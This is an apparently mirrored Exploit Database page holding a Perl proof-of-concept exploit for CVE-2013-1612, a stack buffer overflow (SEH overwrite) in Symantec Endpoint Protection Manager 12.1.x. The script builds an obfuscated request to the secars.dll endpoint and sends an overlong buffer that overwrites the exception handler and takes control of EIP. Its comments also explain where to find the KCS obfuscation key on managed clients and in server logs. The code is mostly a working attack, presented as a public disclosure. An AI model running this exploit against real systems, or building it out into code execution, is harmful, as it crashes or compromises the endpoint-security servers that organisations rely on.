Symantec Endpoint Protection Manager 12.1.x – Overflow (SEH) (PoC)

• Exploit Database
• 108 阅读

• 作者： st3n
  日期： 2014-04-27
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/33056/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125

  # Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33056-sepm-secars-poc-v0.3.tar.gz   #!/usr/bin/perl -w # Exploit Title: Symantec Endpoint Protection Manager 12.1.x - SEH Overflow POC # Date: 31 January 2013 # Exploit Author: st3n@funoverip.net (a.k.a. jerome.nokin@gmail.com) # Vendor Homepage: http://http://www.symantec.com/en/uk/endpoint-protection # Version: 12.1.0 -> 12.1.2 # Tested on: Windows 2003 Enterprise Edition SP2 # CVE : CVE-2013-1612 # More info on: http://funoverip.net/?p=1693 # #===================================================================================== # # This POC code overwrite EIP with "CCCCCCCC" # # About KCS Key: That key is used to obfuscate traffic between client and server. #The key is generated during SEPM installation. #We need that key to talk with the SEPM server.. # # Where to find KCS Key ? # On a managed client station. Search for "Kcs" inside: # # - Win7/Vista/W2k8/and more : #C:\\ProgramData\\Symantec\\Symantec Endpoint Protection\\CurrentVersion\\Data\\Config\\SyLink.xml # - Windows XP : #C:\\Document & Settings\\All Users\\Application Data\\Symantec\\Symantec Endpoint Protection\\ #CurrentVersion\\Data\\Config\\SyLink.xml # # On server side, check the logs: #C:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection Manager\\data\\inbox\\log\\ersecreg.log #=====================================================================================   use warnings; use strict; use IO::Socket::INET; use SEPM::SEPM;     # SEP Manager host/ip my $host= "192.168.60.186"; my $port = 8014;   # Kcs key my $Kcs_hex = "85FB05B288B45D92447A3EDCBEFC434E";   # ---- config end -----         # flush after every write $| = 1;     # Send HTTP request function sub send_request { my $param = shift;# URL parameters my $post_data = shift;# POST DATA my $sock = IO::Socket::INET->new("$host:$port"); if($sock){ print "Connected.. \n";   # HTTP request my $req = "POST /secars/secars.dll?h=$param HTTP/1.0\r\n" . "User-Agent: Smc\r\n" . "Host: $host\r\n" . "Content-Length: " . length($post_data) . "\r\n" . "\r\n" . $post_data ;   # Sending print $sock $req;   # Read HTTP response my $resp = &apos;&apos;; while(<$sock>){ $resp .=$_; }   #print $resp; if($resp =~ /400 Bad Request/) { print "\nERROR: Got &apos;400 Bad Request&apos; from the server. Wrong Kcs key ? Wrong SEP version ?\n"; } close $sock; }   }     # SEP object my $sep = SEPM::SEPM->new();     print "[*] Target: $host:$port\n"; print "[*] KCS Key: $Kcs_hex\n";   # SEPM object for obfuscation print "[*] Generating master encryption key\n"; $sep->genkey($Kcs_hex);   # Obfuscate URL parameters print "[*] Encrypting URI\n"; my $h = $sep->obfuscate("l=9&action=26");   # The evil buff print "[*] Building evil buffer\n"; my $buf = "foo=[hex]" . # [hex] call the vulnerable parsing function "F" x 1288 .# Junk "B" x 8 . # Pointer to next SEH record "CCCCCCCC". # SEH Handler, will overwrite EIP register "D" x 500;# Trigger "Memory Access Violation" exception     # Sending request print "[*] Sending HTTP request\n"; send_request($h, # URL parameters $buf# post data );     print "[*] Done\n";